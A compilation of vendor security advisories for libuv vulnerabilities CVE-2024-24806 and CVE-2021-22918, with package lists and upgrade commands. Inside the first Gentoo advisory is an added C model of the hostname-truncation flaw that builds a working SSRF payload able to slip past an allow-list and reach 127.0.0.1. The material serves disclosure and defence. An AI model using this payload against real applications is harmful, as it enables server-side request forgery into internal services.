- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                   Gentoo Linux Security Advisory           GLSA 202501-05
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                           https://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
     Title: libuv: Hostname Truncation
      Date: January 23, 2025
      Bugs: #924127
        ID: 202501-05

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

A vulnerability has been discovered in libuv, where hostname truncation can
lead to attacker-controlled lookups.

Background
==========

libuv is a multi-platform support library with a focus on asynchronous I/O.

Affected packages
=================

Package          Vulnerable    Unaffected
---------------  ------------  ------------
dev-libs/libuv   < 1.48.0      >= 1.48.0

Description
===========

A vulnerability has been discovered in libuv. Please review the CVE
identifier referenced below for details.

Impact
======

The uv_getaddrinfo function in src/unix/getaddrinfo.c truncates hostnames
to 256 characters before calling getaddrinfo. Because the application
validates the full string while the resolver only sees the truncated prefix,
an attacker can craft a name whose tail satisfies the application's checks
(for example an allow-listed domain suffix) but whose first 256 characters
form an IPv4 literal such as 0x00007f000001 (the hexadecimal form of
127.0.0.1, with leading zeros, which getaddrinfo accepts as a numeric host).
The lookup then resolves to an address the developer never intended, turning
the truncation into a server-side request forgery primitive.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All libuv users should upgrade to the latest version:

  # emerge --sync
  # emerge --ask --oneshot --verbose ">=dev-libs/libuv-1.48.0"

References
==========

[ 1 ] CVE-2024-24806
      https://nvd.nist.gov/vuln/detail/CVE-2024-24806

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202501-05

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the confidentiality
and security of our users' machines is of utmost importance to us. Any
security concerns should be addressed to
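The bypass the Impact section describes, as an added example that is not libuv's code and not part of the advisory: a simplified model of the pre-1.48 hostname copy (silent cut at 255 bytes plus terminator, matching the 256-byte buffer the advisory names) beside the fixed behaviour (reject instead of shorten), an application-side allow-list guard of the kind the attacker bypasses, and the payload that passes the guard in full but reaches the resolver as the hexadecimal IPv4 literal for 127.0.0.1. The buffer size, the suffix `.example.com`, the function names and the guard logic are assumptions for illustration; the literal parsing uses libc `inet_aton`, whose hex/octal/leading-zero rules are the ones glibc's getaddrinfo applies to numeric hosts.

```c
/* Model of CVE-2024-24806: silent hostname truncation before getaddrinfo.
 * Illustrative model only, not libuv's source. */
#define _DEFAULT_SOURCE 1
#include <arpa/inet.h>
#include <netinet/in.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define HOSTNAME_BUF 256   /* the fixed-size buffer the advisory describes (assumed) */
#define MAX_PAYLOAD  512

/* Pre-1.48 behaviour (modelled): copy what fits, drop the rest, report success. */
int copy_hostname_vulnerable(const char *in, char *out, size_t outlen) {
  size_t n = strlen(in);
  if (n > outlen - 1)
    n = outlen - 1;              /* silent truncation: the tail is lost */
  memcpy(out, in, n);
  out[n] = '\0';
  return 0;
}

/* Fixed behaviour (modelled): an over-long hostname is an error, never shortened.
 * This is the fail-closed effect of the 1.48.0 fix, not its literal code. */
int copy_hostname_fixed(const char *in, char *out, size_t outlen) {
  size_t n = strlen(in);
  if (n > outlen - 1)
    return -1;
  memcpy(out, in, n + 1);
  return 0;
}

/* Whether the string is accepted as an IPv4 literal under inet_aton rules
 * (hex, octal and leading zeros included); writes the host-order address. */
int parses_as_ipv4(const char *host, uint32_t *ip_out) {
  struct in_addr a;
  if (!inet_aton(host, &a))
    return 0;
  if (ip_out)
    *ip_out = ntohl(a.s_addr);
  return 1;
}

/* A typical application-side SSRF guard (assumed), run on the string before
 * it reaches the resolver: no raw IP literals, only names under one domain. */
int app_allows_hostname(const char *host) {
  const char *suffix = ".example.com";     /* hypothetical allow-listed domain */
  size_t hl = strlen(host), sl = strlen(suffix);
  if (parses_as_ipv4(host, NULL))
    return 0;
  return hl > sl && strcmp(host + hl - sl, suffix) == 0;
}

/* Constructed attacker input: "0x", zero padding, then the hex for 127.0.0.1
 * placed so it ends exactly at the truncation boundary, followed by the
 * allow-listed suffix the guard wants to see. Returns the payload length. */
size_t build_ssrf_payload(char *buf, size_t buflen) {
  const char *hex = "7f000001";            /* 127.0.0.1 in hex */
  const char *suffix = ".example.com";
  size_t keep = HOSTNAME_BUF - 1;          /* bytes that survive truncation */
  size_t pad = keep - strlen(hex);
  if (buflen < keep + strlen(suffix) + 1)
    return 0;
  memset(buf, '0', pad);
  buf[1] = 'x';
  memcpy(buf + pad, hex, strlen(hex));
  strcpy(buf + keep, suffix);
  return strlen(buf);
}

/* Whole chain: guard on the full string, vulnerable copy, then parse what the
 * resolver would see. Returns that IPv4 in host order, or 0 if blocked. */
uint32_t ip_seen_by_resolver_after_truncation(void) {
  char payload[MAX_PAYLOAD], seen[HOSTNAME_BUF];
  uint32_t ip = 0;
  if (!build_ssrf_payload(payload, sizeof payload))
    return 0;
  if (!app_allows_hostname(payload))
    return 0;
  copy_hostname_vulnerable(payload, seen, sizeof seen);
  return parses_as_ipv4(seen, &ip) ? ip : 0;
}

/* Same payload against the fixed copy: 1 if it is rejected outright. */
int fixed_copy_rejects_payload(void) {
  char payload[MAX_PAYLOAD], seen[HOSTNAME_BUF];
  build_ssrf_payload(payload, sizeof payload);
  return copy_hostname_fixed(payload, seen, sizeof seen) == -1;
}

int main(void) {
  uint32_t ip = ip_seen_by_resolver_after_truncation();
  printf("resolver sees 0x%08x after truncation\n", ip);
  printf("fixed copy rejects payload: %d\n", fixed_copy_rejects_payload());
  return 0;
}
```

The guard is correct on its own terms; the defect is that it and the resolver disagree about which string is being looked up. Any length limit applied to an external name must therefore reject rather than shorten, and applications that cannot upgrade should enforce a 255-byte maximum on hostnames themselves before handing them to uv_getaddrinfo.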
# Security update for libuv

Announcement ID: SUSE-SU-2024:4109-1
Release Date: 2024-11-28T16:15:50Z
Rating: moderate
References:

* bsc#1219724

Cross-References:

* CVE-2024-24806

CVSS scores:

* CVE-2024-24806 ( SUSE ): 5.8 CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N
* CVE-2024-24806 ( NVD ): 7.3 CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

Affected Products:

* Basesystem Module 15-SP5
* Basesystem Module 15-SP6
* openSUSE Leap 15.5
* openSUSE Leap 15.6
* SUSE Linux Enterprise Desktop 15 SP5
* SUSE Linux Enterprise Desktop 15 SP6
* SUSE Linux Enterprise High Performance Computing 15 SP5
* SUSE Linux Enterprise Micro 5.5
* SUSE Linux Enterprise Real Time 15 SP5
* SUSE Linux Enterprise Real Time 15 SP6
* SUSE Linux Enterprise Server 15 SP5
* SUSE Linux Enterprise Server 15 SP6
* SUSE Linux Enterprise Server for SAP Applications 15 SP5
* SUSE Linux Enterprise Server for SAP Applications 15 SP6

An update that solves one vulnerability can now be installed.

## Description:

This update for libuv fixes the following issues:

* CVE-2024-24806: Fixed improper domain lookup (hostname truncation in uv_getaddrinfo) that potentially leads to SSRF attacks (bsc#1219724)

## Patch Instructions:

To install this SUSE update use the SUSE recommended installation methods like YaST online_update or "zypper patch".

Alternatively you can run the command listed for your product:

* openSUSE Leap 15.5
  zypper in -t patch SUSE-2024-4109=1 openSUSE-SLE-15.5-2024-4109=1
* openSUSE Leap 15.6
  zypper in -t patch openSUSE-SLE-15.6-2024-4109=1
* SUSE Linux Enterprise Micro 5.5
  zypper in -t patch SUSE-SLE-Micro-5.5-2024-4109=1
* Basesystem Module 15-SP5
  zypper in -t patch SUSE-SLE-Module-Basesystem-15-SP5-2024-4109=1
* Basesystem Module 15-SP6
  zypper in -t patch SUSE-SLE-Module-Basesystem-15-SP6-2024-4109=1

## Package List:

* openSUSE Leap 15.5 (aarch64 ppc64le s390x x86_64 i586)
  * libuv1-debuginfo-1.44.2-150500.3.5.1
  * libuv1-1.44.2-150500.3.5.1
  * libuv-debugsource-1.44.2-150500.3.5.1
  * libuv-devel-1.44.2-150500.3.5.1
* openSUSE Leap 15.5 (x86_64)
  * libuv1-32bit-1.44.2-150500.3.5.1
  * libuv1-32bit-debuginfo-1.44.2-150500.3.5.1
* openSUSE Leap 15.5 (aarch64_ilp32)
  * libuv1-64bit-debuginfo-1.44.2-150500.3.5.1
  * libuv1-64bit-1.44.2-150500.3.5.1
* openSUSE Leap 15.6 (aarch64 ppc64le s390x x86_64)
  * libuv1-debuginfo-1.44.2-150500.3.5.1
  * libuv1-1.44.2-150500.3.5.1
  * libuv-debugsource-1.44.2-150500.3.5.1
  * libuv-devel-1.44.2-150500.3.5.1
* openSUSE Leap 15.6 (x86_64)
  * libuv1-32bit-1.44.2-150500.3.5.1
  * libuv1-32bit-debuginfo-1.44.2-150500.3.5.1
* SUSE Linux Enterprise Micro 5.5 (aarch64)
  * libuv-debugsource-1.44.2-150500.3.5.1
  * libuv-devel-1.44.2-150500.3.5.1
* SUSE Linux Enterprise Micro 5.5 (aarch64 ppc64le s390x x86_64)
  * libuv1-debuginfo-1.44.2-150500.3.5.1
  * libuv1-1.44.2-150500.3.5.1
* Basesystem Module 15-SP5 (aarch64 ppc64le s390x x86_64)
  * libuv1-debuginfo-1.44.2-150500.3.5.1
  * libuv1-1.44.2-150500.3.5.1
  * libuv-debugsource-1.44.2-150500.3.5.1
  * libuv-devel-1.44.2-150500.3.5.1
* Basesystem Module 15-SP6 (aarch64 ppc64le s390x x86_64)
  * libuv1-debuginfo-1.44.2-150500.3.5.1
  * libuv1-1.44.2-150500.3.5.1
  * libuv-debugsource-1.44.2-150500.3.5.1
  * libuv-devel-1.44.2-150500.3.5.1

## References:

* https://www.suse.com/security/cve/CVE-2024-24806.html
* https://bugzilla.suse.com/show_bug.cgi?id=1219724

SUSE backports the fix for CVE-2024-24806 (SSRF via hostname truncation) to libuv 1.44.2 for SLE 15 SP5/SP6, SLE Micro 5.5 and openSUSE Leap 15.5/15.6; apply the patch promptly.
Severity: Moderate
LinuxSecurity.com Team
Oracle Linux Security Advisory ELSA-2024-4756

http://linux.oracle.com/errata/ELSA-2024-4756.html

The following updated rpms for Oracle Linux 9 have been uploaded to the Unbreakable Linux Network:

x86_64:
libuv-1.42.0-2.el9_4.i686.rpm
libuv-1.42.0-2.el9_4.x86_64.rpm
libuv-devel-1.42.0-2.el9_4.i686.rpm
libuv-devel-1.42.0-2.el9_4.x86_64.rpm

aarch64:
libuv-1.42.0-2.el9_4.aarch64.rpm
libuv-devel-1.42.0-2.el9_4.aarch64.rpm

SRPMS:
http://oss.oracle.com/ol9/SRPMS-updates//libuv-1.42.0-2.el9_4.src.rpm

Related CVEs:
CVE-2024-24806

Description of changes:

[1:1.42.0-2]
- Backport fix for CVE-2024-24806
  Resolves: RHEL-24791

_______________________________________________
El-errata mailing list
Oracle Linux Security Advisory ELSA-2024-4247

http://linux.oracle.com/errata/ELSA-2024-4247.html

The following updated rpms for Oracle Linux 8 have been uploaded to the Unbreakable Linux Network:

x86_64:
libuv-1.41.1-2.el8_10.i686.rpm
libuv-1.41.1-2.el8_10.x86_64.rpm
libuv-devel-1.41.1-2.el8_10.i686.rpm
libuv-devel-1.41.1-2.el8_10.x86_64.rpm

aarch64:
libuv-1.41.1-2.el8_10.aarch64.rpm
libuv-devel-1.41.1-2.el8_10.aarch64.rpm

SRPMS:
http://oss.oracle.com/ol8/SRPMS-updates//libuv-1.41.1-2.el8_10.src.rpm

Related CVEs:
CVE-2024-24806

Description of changes:

[1:1.41.1-2]
- Backport fixes for CVE-2024-24806
  Resolves: RHEL-24790
==========================================================================
Ubuntu Security Notice USN-6666-1
February 28, 2024

libuv1 vulnerability
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 23.10
- Ubuntu 22.04 LTS
- Ubuntu 20.04 LTS

Summary:

libuv could be made to truncate certain hostnames.

Software Description:
- libuv1: asynchronous event notification library

Details:

It was discovered that libuv incorrectly truncated certain hostnames. A
remote attacker could possibly use this issue with specially crafted
hostnames to bypass certain checks.

Update instructions:

The problem can be corrected by updating your system to the following
package versions:

Ubuntu 23.10:
  libuv1                          1.44.2-1ubuntu0.1

Ubuntu 22.04 LTS:
  libuv1                          1.43.0-1ubuntu0.1

Ubuntu 20.04 LTS:
  libuv1                          1.34.2-1ubuntu1.5

In general, a standard system update will make all the necessary changes.

References:
  https://ubuntu.com/security/notices/USN-6666-1
  CVE-2024-24806

Package Information:
  https://launchpad.net/ubuntu/+source/libuv1/1.44.2-1ubuntu0.1
  https://launchpad.net/ubuntu/+source/libuv1/1.43.0-1ubuntu0.1
  https://launchpad.net/ubuntu/+source/libuv1/1.34.2-1ubuntu1.5

Ubuntu 20.04 LTS, 22.04 LTS and 23.10 ship fixed libuv1 packages for CVE-2024-24806; apply the update to close the hostname-truncation check bypass.
Severity: Important
LinuxSecurity.com Team
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

[slackware-security]  libuv (SSA:2024-051-02)

New libuv packages are available for Slackware 15.0 and -current to
fix a security issue.

Here are the details from the Slackware 15.0 ChangeLog:
+--------------------------+
patches/packages/libuv-1.48.0-i586-1_slack15.0.txz:  Upgraded.
  This update fixes a server-side request forgery (SSRF) flaw.
  Thanks to alex2grad for the heads-up.
  For more information, see:
    https://www.cve.org/CVERecord?id=CVE-2024-24806
  (* Security fix *)
+--------------------------+

Where to find the new packages:
+-----------------------------+

Thanks to the friendly folks at the OSU Open Source Lab
(https://osuosl.org/) for donating FTP and rsync hosting
to the Slackware project!  :-)

Also see the "Get Slack" section on http://www.slackware.com/ for
additional mirror sites near you.

Updated package for Slackware 15.0:
ftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/libuv-1.48.0-i586-1_slack15.0.txz

Updated package for Slackware x86_64 15.0:
ftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/libuv-1.48.0-x86_64-1_slack15.0.txz

Updated package for Slackware -current:

Updated package for Slackware x86_64 -current:

MD5 signatures:
+-------------+

Slackware 15.0 package:
168acaabcc67333e202fc3d9ac527d44  libuv-1.48.0-i586-1_slack15.0.txz

Slackware x86_64 15.0 package:
d6bf2ac93ed9649937755919a5233275  libuv-1.48.0-x86_64-1_slack15.0.txz

Slackware -current package:
fbcd398c4621d98839d041ec8632fc7f  l/libuv-1.48.0-i586-1.txz

Slackware x86_64 -current package:
08108e6e433d2af7c84a39415fffd64a  l/libuv-1.48.0-x86_64-1.txz

Installation instructions:
+------------------------+

Upgrade the package as root:
# upgradepkg libuv-1.48.0-i586-1_slack15.0.txz

+-----+

Updated libuv 1.48.0 packages for Slackware 15.0 and -current fix the server-side request forgery flaw tracked as CVE-2024-24806.
Severity: Important
LinuxSecurity.com Team
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                   Gentoo Linux Security Advisory           GLSA 202401-23
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                           https://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Low
     Title: libuv: Buffer Overread
      Date: January 16, 2024
      Bugs: #800986
        ID: 202401-23

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

A buffer overread vulnerability has been found in libuv.

Background
==========

libuv is a multi-platform support library with a focus on asynchronous I/O.

Affected packages
=================

Package          Vulnerable    Unaffected
---------------  ------------  ------------
dev-libs/libuv   < 1.41.1      >= 1.41.1

Description
===========

libuv fails to ensure that a pointer lies within the bounds of a defined
buffer in the uv__idna_toascii() function before reading and manipulating
the memory at that address.

Impact
======

The overread can result in information disclosure or application crash.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All libuv users should upgrade to the latest version:

  # emerge --sync
  # emerge --ask --oneshot --verbose ">=dev-libs/libuv-1.41.1"

References
==========

[ 1 ] CVE-2021-22918
      https://nvd.nist.gov/vuln/detail/CVE-2021-22918

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202401-23

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the confidentiality
and security of our users' machines is of utmost importance to us. Any
security concerns should be addressed to
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

====================================================================
                   Red Hat Security Advisory

Synopsis:          Low: libuv security update
Advisory ID:       RHSA-2021:3075-01
Product:           Red Hat Enterprise Linux
Advisory URL:      https://access.redhat.com/errata/RHSA-2021:3075
Issue date:        2021-08-10
CVE Names:         CVE-2021-22918
====================================================================

1. Summary:

An update for libuv is now available for Red Hat Enterprise Linux 8.

Red Hat Product Security has rated this update as having a security impact
of Low. A Common Vulnerability Scoring System (CVSS) base score, which gives
a detailed severity rating, is available for each vulnerability from the CVE
link(s) in the References section.

2. Relevant releases/architectures:

Red Hat CodeReady Linux Builder (v. 8) - aarch64, ppc64le, s390x, x86_64
Red Hat Enterprise Linux AppStream (v. 8) - aarch64, ppc64le, s390x, x86_64

3. Description:

libuv is a multi-platform support library with a focus on asynchronous I/O.

Security Fix(es):

* libuv: out-of-bounds read in uv__idna_toascii() can lead to information
disclosures or crashes (CVE-2021-22918)

For more details about the security issue(s), including the impact, a CVSS
score, acknowledgments, and other related information, refer to the CVE
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

1979338 - CVE-2021-22918 libuv: out-of-bounds read in uv__idna_toascii() can lead to information disclosures or crashes

6. Package List:

Red Hat Enterprise Linux AppStream (v. 8):

Source:
libuv-1.41.1-1.el8_4.src.rpm

aarch64:
libuv-1.41.1-1.el8_4.aarch64.rpm
libuv-debuginfo-1.41.1-1.el8_4.aarch64.rpm
libuv-debugsource-1.41.1-1.el8_4.aarch64.rpm

ppc64le:
libuv-1.41.1-1.el8_4.ppc64le.rpm
libuv-debuginfo-1.41.1-1.el8_4.ppc64le.rpm
libuv-debugsource-1.41.1-1.el8_4.ppc64le.rpm

s390x:
libuv-1.41.1-1.el8_4.s390x.rpm
libuv-debuginfo-1.41.1-1.el8_4.s390x.rpm
libuv-debugsource-1.41.1-1.el8_4.s390x.rpm

x86_64:
libuv-1.41.1-1.el8_4.i686.rpm
libuv-1.41.1-1.el8_4.x86_64.rpm
libuv-debuginfo-1.41.1-1.el8_4.i686.rpm
libuv-debuginfo-1.41.1-1.el8_4.x86_64.rpm
libuv-debugsource-1.41.1-1.el8_4.i686.rpm
libuv-debugsource-1.41.1-1.el8_4.x86_64.rpm

Red Hat CodeReady Linux Builder (v. 8):

aarch64:
libuv-debuginfo-1.41.1-1.el8_4.aarch64.rpm
libuv-debugsource-1.41.1-1.el8_4.aarch64.rpm
libuv-devel-1.41.1-1.el8_4.aarch64.rpm

ppc64le:
libuv-debuginfo-1.41.1-1.el8_4.ppc64le.rpm
libuv-debugsource-1.41.1-1.el8_4.ppc64le.rpm
libuv-devel-1.41.1-1.el8_4.ppc64le.rpm

s390x:
libuv-debuginfo-1.41.1-1.el8_4.s390x.rpm
libuv-debugsource-1.41.1-1.el8_4.s390x.rpm
libuv-devel-1.41.1-1.el8_4.s390x.rpm

x86_64:
libuv-debuginfo-1.41.1-1.el8_4.i686.rpm
libuv-debuginfo-1.41.1-1.el8_4.x86_64.rpm
libuv-debugsource-1.41.1-1.el8_4.i686.rpm
libuv-debugsource-1.41.1-1.el8_4.x86_64.rpm
libuv-devel-1.41.1-1.el8_4.i686.rpm
libuv-devel-1.41.1-1.el8_4.x86_64.rpm

These packages are GPG signed by Red Hat for security. Our key and
details on how to verify the signature are available from
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2021-22918
https://access.redhat.com/security/updates/classification/#low

8. Contact:

The Red Hat security contact is . More contact details at
https://access.redhat.com/security/team/contact/

Copyright 2021 Red Hat, Inc.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1

iQIVAwUBYRKHF9zjgjWX9erEAQgFSg/9G7tl+zmuvPat250k5lMMjMAjXEORullZ
2BLXDewnevV/kWxe4+GkRdG97GYtC8qpWoGnfq0zZoZKgP1Jd5KdYl6kZWDZ5I0W
h2IDewyI84nKVF/rOHXFIssCdIDDRsyNH22x9C29AxkVeAtkGILKzFg/syjjhPNl
5joJquPNwOp3a/7zD1BEjROMAoZERm7EEjEeVbpY+bX7FiVlZws9gCnfmL6eLKoR
cfjQB+JSesJN1XK0QX5iisVrM3LXu3NSPKH1tzgZwjuw7GwSukuqW5hEWfaey/0v
JBsv8zUJ7zPaJIFCZGM8ic90GWVDzF7hDH4qMcygSHTRGb7QqoZoq8juzDeVPUfA
iT0CJr5Qejhsioykoydhn/2RTG9RHaIkHsQNO371ltsa7wRVIKNhffa5JbbhHiXn
87OF8JbEM89ei23lls8NHVeg+5WxZH7iO8Ef1Vu5QcG9vL0pq5F5Krjz7wcaTZG0
o1TayLV2mMaAJwE8uBBtr3meh1uoGk0crQYThr9OHvlL3Gfd0MQyRP0NNkhP0DS4
p6r3ogDxGDqiDRgWBRheNDLrCfwd/69KqvqidV5AH7CVo+YcI5J2WkFu4fQZbTiy
grKhy9zeiyukKIpPL5ohmle1EYSEKcgBw+fxJI0XTF6CzmCtmJGRS+e5xulJly5+
qvzHYz1a8Sw=
=yxIS
-----END PGP SIGNATURE-----

--
RHSA-announce mailing list